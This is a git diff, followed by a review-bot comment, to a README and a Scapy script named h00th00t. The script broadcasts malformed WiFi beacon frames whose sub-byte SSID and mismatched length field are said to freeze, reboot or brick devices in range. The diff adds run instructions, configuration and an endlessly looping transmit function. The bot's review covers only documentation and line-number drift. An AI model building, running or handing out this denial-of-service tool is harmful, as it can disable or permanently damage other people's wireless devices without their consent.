diff --git a/README.md b/README.md index cbb8d4c..8ef9fef 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,8 @@ # h00th00t ## Sub-Byte Binary Underflow in WiFi Devices ## Warning: Test With Extreme Care -### Summary +### Warning: USE AT YOUR OWN PERIL +## Summary Sending WiFi beacons where the SSID is set to some non-byte number of bits and a poorly matching SSID length breaks many random WiFi devices in range. Some devices freeze, some reboot, some break, some brick. @@ -19,10 +20,12 @@ Testing is very challenging as it requires being out of range of all other WiFi ## Hooting (usage) **DO NOT TEST IN RANGE OF ANY DEVICE YOU ARE UNWILLING TO DAMAGE** -1. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html) -2. Uncomment line `19` of [h00thoot.py](./h00th00t.py) -3. `python h00th00t.py` - +1. Designed for **linux** environments with **python3** +2. Optional: edit line `4` and `5` of [h00thoot.py](./h00th00t.py) to match your sender and wifi device preferences + * Defaults are fine for most purposes +3. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html) +4. Uncomment line `19` of [h00thoot.py](./h00th00t.py) +5. `python h00th00t.py` + * in some linux environments, sudo may be needed `sudo python h00th00t.py` --- - ![Stolas uwu~](./stolas-headdesk.gif) \ No newline at end of file diff --git a/h00th00t.py b/h00th00t.py index 0b6e6a8..98c88f5 100644 --- a/h00th00t.py +++ b/h00th00t.py 
@@ -1,19 +1,30 @@ from scapy.all import * # config your stuff here -iface = 'wlan1' -sender = RandMAC() +iface = 'wlan0' +sender_bssid_mac = RandMAC() # used for source mac and bssid # send raw wifi beacon frames -def beacon_raw(SSID, length=255): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=RandMAC(), addr3=RandMAC()) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) - frame = RadioTap()/dot11/beacon/essid +## USAGE: +### beacon_raw(, , ) +### or +### beacon_raw(SSID=, reported_length=, interval_seconds=) +## DEFAULTS: +### SSID="DUMMY SSID" +### reported_length=255 +### interval_seconds=0.250 +def beacon_raw(SSID="DUMMY SSID", reported_length=255, interval_seconds=0.250): + # addr1 is destination (broadcast), addr2 is the source mac, addr3 is the bssid + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender_bssid_mac, addr3=sender_bssid_mac) # set the frame settings + beacon = Dot11Beacon() # create the beacon + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=reported_length) # magic really happens here with Scapy's RawVal() function and the reported_length + frame = RadioTap()/dot11/beacon/essid # assemble the frame + print("FIRIN MY LAZORRRRRR") - sendp(frame, iface=iface, inter=0.250, loop=1) + sendp(frame, iface=iface, inter=interval_seconds, loop=1) # send on loop +# this can be most any value really experimentation is needed ssid_binary = 0b0101 # a few random bits to send as the SSID -# please be careful with this, it can crash your local wifi devices -# beacon_raw(ssid_binary, length=255) # send it \ No newline at end of file +# please be careful with this, it can crash or damage your local wifi devices +# beacon_raw(ssid_binary) # send it! USE WITH EXTREME CARE \ No newline at end of file
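Review bot: The positional usage line `### beacon_raw(, , )` in the new comment block has empty parameter slots, and neither that block nor the function body says that `sendp(..., loop=1)` never returns and keeps transmitting until interrupted. I would replace the `##`/`###` comment block with a docstring that names the positional parameters (`beacon_raw(SSID, reported_length, interval_seconds)`), notes that `iface` is read from the module global rather than passed in, and states plainly that the call blocks and loops indefinitely. The added comment lines also push the commented-out `# beacon_raw(ssid_binary)` call well below line 19, so the README step `Uncomment line 19` updated in this same commit very likely no longer points at it; referring to the call by its text rather than a line number would avoid that drift. Whether the new `print("FIRIN MY LAZORRRRRR")` is meant to be the only indication that transmission has started should be stated in the same docstring, since nothing else is logged before the loop.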